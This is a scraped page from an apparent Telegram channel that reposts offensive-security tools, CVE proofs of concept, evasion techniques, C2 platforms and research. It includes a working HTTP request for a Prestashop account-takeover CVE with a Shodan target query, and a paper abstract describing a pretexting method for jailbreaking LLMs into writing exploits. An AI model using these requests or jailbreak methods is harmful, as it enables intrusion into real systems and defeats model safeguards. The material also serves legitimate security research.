reconcore
1.93K subscribers
1.16K photos
164 videos
298 files
2.5K links
#pentest #vulnerability #research #malware #analysis #redteam #blueteam #tools #cve #rce #lpe

#offensivesecurity #methods #technique

The channel does not call for any action.
The posts are taken from public sources.
The @reconcore is not responsible.
Download Telegram
open-redirect-payload-list
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

#security #payload #websec #openredirect @reconcore
LLMs_for_Vulnerability_Exploitation_in_Enterprise_Software.pdf
3.5 MB
From Rookie to Expert: Manipulating LLMs for Automated Vulnerability Exploitation in Enterprise Software Dec. 2025.
We show in this work how publicly available LLMs can be socially engineered to transform novices into capable attackers, challenging the foundational principle that exploitation requires technical expertise. To that end, we propose RSA (Role-assignment, Scenario-pretexting, and Action-solicitation), a pretexting strategy that manipulates LLMs into generating functional exploits despite their safety mechanisms

#llm #redteam @reconcore
Attacking_AD_Using_Only_Linux.pdf
1.3 MB
Attacking Active Directory with Linux - Lab Manual 2025.
#ad #book #technique @reconcore
From Code to Coverage:
The OID Transformation That Hinders LDAP Detection part one
..we learned to think like an attacker—understanding how Impacket tools construct their LDAP queries

The Whitespace Nightmare: Writing Sigma Rules That Actually Match part two
..we learned to think like a log parser having an existential crisis - handling every possible variation those queries might take after going through the transformation gauntlet

#blueteam #ldap #dfir #technique @reconcore
GhostlyHollowingViaTamperedSyscalls2
This implementation utilizes two techniques covered in the recent updates to the Maldev Academy course:
Tampered Syscalls Via Hardware BreakPoints: Used to bypass userland hooks while simultaneously spoofing the invoked syscall's arguments.
Ghostly Hollowing: A hybrid technique between Process Hollowing and Process Ghosting.

#technique #injection #bypass #syscall #invoke #spoof #pe @reconcore
Happy New Year 🎉
Know that I'm not posting anything here for you.
5🎄52😭11
wmie WMI Explorer
A modern Windows desktop application for exploring and managing Windows Management Instrumentation (WMI) namespaces, classes, instances, properties, and methods. Built with WPF and .NET 8.0.

@reconcore
profilehound
ProfileHound - BloodHound OpenGraph collector for user profiles stored on domain machines. Make informed decisions about looting secrets by identifying active user profiles on domain machines.

#ad #bloodhound #pentest #tools #redteam @reconcore
BOF_RunPe
Execute PE files in-memory using Cobalt Strike's Beacon, eliminating child processes and consoles for stealthy operations and efficient output handling.

#python #windows #automation #scripts #incident #response #re #hunting #tools #malware #analysis #forensics #security #bof #pe #runpe #exploit #dev @reconcore
CVE-2025-52691 PoC: SmarterMail Arbitrary File Upload RCE (APT-Enhanced)
An enhanced proof-of-concept exploit for CVE-2025-52691 (SmarterMail Arbitrary File Upload RCE) with APT-level features like stealth obfuscation, persistence, exfiltration, and interactive mode. For educational and authorized testing only. Credits to the original PoC by yt2w/CVE-2025-52691.

#apt #cve #poc #rce @reconcore
ThreatActors-TTPs
Repository created to share information about tactics, techniques and procedures used by threat actors. Initially with ransomware groups and evolving to other types of threats.

#technique #malware #ransomware #ttp #mitre #ransomware @reconcore
🔥1
intercept Signal Intelligence Platform
A sleek, modern web-based front-end for signal intelligence tools.
Unified interface for pager decoding, 433MHz sensors, ADS-B aircraft tracking, satellite monitoring, WiFi reconnaissance, and Bluetooth scanning.

#tools #intelligence #signal @reconcore
1
CVE-2025-61922: Zero-Click Account Takeover on Prestashop
9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
POST /module/ps_checkout/ExpressCheckout HTTP/1.1
Host: localhost:3000
Content-Length: 72

{"orderID":"1","order":{"payer":{"email_address":"presta@example.com"}}}

Shodan: /search?query=prestashop
#vulnerability #research #cve #zeroclick #poc @reconcore
1
race-toolkit Communicate with Airoha-based Bluetooth devices using the RACE protocol via Bluetooth and USB.
CVE-2025-20700 CVE-2025-20701 CVE-2025-20702
RACE Toolkit is the tool released alongside our Airoha research. You can find more about that in our blog post.

This repository contains a Python-based command-line toolkit for interacting with devices that expose the RACE protocol over various transports (BLE GATT, Bluetooth Classic RFCOMM, USB HID). It is primarily intended for further security research into the Airoha ecosystem and for end-users to check whether their devices are affected by the vulnerabilities.

#tools #transport #protocol #offensivesecurity @reconcore
ZeroPulse: Modern Command & Control (C2) Platform with Cloudflare Tunnel Integration
Modern C2 Platform with Cloudflare Tunnel Integration | WinRM & SSH Remote Management | Real-time Terminal & Remote Desktop | Built with FastAPI & React

#javascript #python #ssh #backdoor #powershell #cloudflare #rat #pentest #postexploitation #winrm #linux #kali #c2 #redteam #commandandcontrol #fastapi #framework @reconcore
exploits_2025.tgz
287.9 MB
Complete comprehensive archive of all 1558 exploits added to Packet Storm in 2025.
#exploit @reconcore
1
MSFinger: Microsoft Network Service Fingerprinting Tool
secorizon.com/
MSFinger is a high-performance network fingerprinting tool designed for internal network reconnaissance. It rapidly identifies Microsoft services, detects security configurations, and highlights potential vulnerabilities across SMB, LDAP, and LDAPS protocols.

#ldap #smb #protocol @reconcore